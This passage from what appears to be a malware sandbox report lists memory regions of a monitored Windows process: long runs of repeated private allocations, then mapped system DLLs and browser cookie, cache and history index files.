entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7619 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7620 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7621 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7622 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7623 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7624 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7625 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7626 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7627 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7628 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7629 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7630 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7631 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7632 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7633 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7634 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7635 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7636 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7637 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7638 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7639 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7640 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7641 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7642 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7643 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7644 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7645 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7646 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7647 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7648 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7649 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7650 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7651 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7652 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7653 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7654 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7655 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7656 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7657 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7658 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7659 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7660 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7661 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7662 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7663 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7664 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7665 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7666 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7667 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7668 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7669 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7670 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7671 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7672 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7673 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7674 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7675 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7676 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7677 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7678 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7679 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7680 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7681 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7682 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7683 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7684 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7685 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7686 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7687 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7688 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7689 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7690 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7691 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7692 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7693 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7694 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7695 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7696 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7697 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7698 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7699 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7700 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7701 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7702 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7703 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7704 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7705 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7706 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7707 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7708 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7709 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7710 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7711 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7712 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7713 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7714 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7715 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7716 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7717 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7718 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7719 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7720 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7721 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7722 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7723 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7724 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7725 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7726 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7727 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7728 start_va = 0x170000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7732 start_va = 0x4540000 end_va = 0x4734fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004540000" filename = "" Region: id = 7733 start_va = 0x74320000 end_va = 0x7439ffff monitored = 0 entry_point = 0x743337c9 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 7734 start_va = 0x4740000 end_va = 0x483ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004740000" filename = "" Region: id = 7735 start_va = 0x4210000 end_va = 0x42eefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004210000" filename = "" Region: id = 7736 start_va = 0x170000 end_va = 0x170fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000170000" filename = "" Region: id = 7737 start_va = 0x76530000 end_va = 0x765b2fff monitored = 0 entry_point = 0x765323d2 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 7738 start_va = 0x180000 end_va = 0x180fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000180000" filename = "" Region: id = 7739 start_va = 0x746b0000 end_va = 0x7512ffff monitored = 0 entry_point = 0x746b6b95 region_type = mapped_file name = "ieframe.dll" filename = "\\Windows\\SysWOW64\\ieframe.dll" (normalized: "c:\\windows\\syswow64\\ieframe.dll") Region: id = 7740 start_va = 0x76ca0000 end_va = 0x76ca4fff monitored = 0 entry_point = 0x76ca1438 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\SysWOW64\\psapi.dll" (normalized: "c:\\windows\\syswow64\\psapi.dll") Region: id = 7741 start_va = 0x74670000 end_va = 0x746abfff monitored = 0 entry_point = 0x74673089 region_type = mapped_file name = "oleacc.dll" filename = "\\Windows\\SysWOW64\\oleacc.dll" (normalized: "c:\\windows\\syswow64\\oleacc.dll") Region: id = 7742 start_va = 0x755b0000 end_va = 0x761f9fff monitored = 0 entry_point = 0x75631601 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 7743 start_va = 0x260000 end_va = 0x260fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "oleaccrc.dll" filename = "\\Windows\\SysWOW64\\oleaccrc.dll" (normalized: "c:\\windows\\syswow64\\oleaccrc.dll") Region: id = 7744 start_va = 0x270000 end_va = 0x271fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 7745 start_va = 0x744d0000 end_va = 0x7466dfff monitored = 0 entry_point = 0x744fe6b5 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll") Region: id = 7746 start_va = 0x280000 end_va = 0x280fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 7747 start_va = 0x2d0000 end_va = 0x2d1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002d0000" filename = "" Region: id = 7748 start_va = 0x4840000 end_va = 0x4b0efff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 7749 start_va = 0x73620000 end_va = 0x7364dfff monitored = 0 entry_point = 0x736216ed region_type = mapped_file name = "mlang.dll" filename = "\\Windows\\SysWOW64\\mlang.dll" (normalized: "c:\\windows\\syswow64\\mlang.dll") Region: id = 7750 start_va = 0x280000 end_va = 0x280fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000280000" filename = "" Region: id = 7751 start_va = 0x744c0000 end_va = 0x744cafff monitored = 0 entry_point = 0x744c1992 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 7752 start_va = 0x320000 end_va = 0x32ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "index.dat" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat") Region: id = 7753 start_va = 0x330000 end_va = 0x337fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "index.dat" filename = "\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat") Region: id = 7754 start_va = 0x4f0000 end_va = 0x503fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "index.dat" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat") Region: id = 7755 start_va = 0x74490000 end_va = 0x744b0fff monitored = 0 entry_point = 0x7449145e region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\SysWOW64\\ntmarta.dll" (normalized: "c:\\windows\\syswow64\\ntmarta.dll") Region: id = 7756 start_va = 0x77130000 end_va = 0x77174fff monitored = 0 entry_point = 0x771311e1 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\SysWOW64\\Wldap32.dll" (normalized: "c:\\windows\\syswow64\\wldap32.dll") Region: id = 7757 start_va = 0x74400000 end_va = 0x74408fff monitored = 0 entry_point = 0x74401220 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 7758 start_va = 0x340000 end_va = 0x347fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "urlmon.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\urlmon.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\urlmon.dll.mui") Region: id = 7759 start_va = 0x4b10000 end_va = 0x4c0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004b10000" filename = "" Region: id = 7760 start_va = 0x75220000 end_va = 0x7522bfff monitored = 0 entry_point = 0x7522505c region_type = mapped_file name = "vaultcli.dll" filename = "\\Windows\\SysWOW64\\vaultcli.dll" (normalized: "c:\\windows\\syswow64\\vaultcli.dll") Region: id = 7761 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7762 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 7763 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7764 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 7765 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7766 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 7767 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7768 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 7769 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7770 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 7771 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7772 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 7773 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7774 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 7775 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7776 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 7777 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7778 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 7779 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7780 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 7781 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7782 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 7783 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7784 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 7785 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7786 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 7787 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7788 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 7789 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7790 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 7791 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7792 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 7793 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7794 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 7795 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7796 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 7797 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7798 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 7799 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7800 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 7801 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7802 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 7803 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7804 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 7805 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7806 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 7807 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7808 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 7809 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7810 start_va = 0x720000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 7811 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7812 start_va = 0x720000 end_va = 0x73ffff 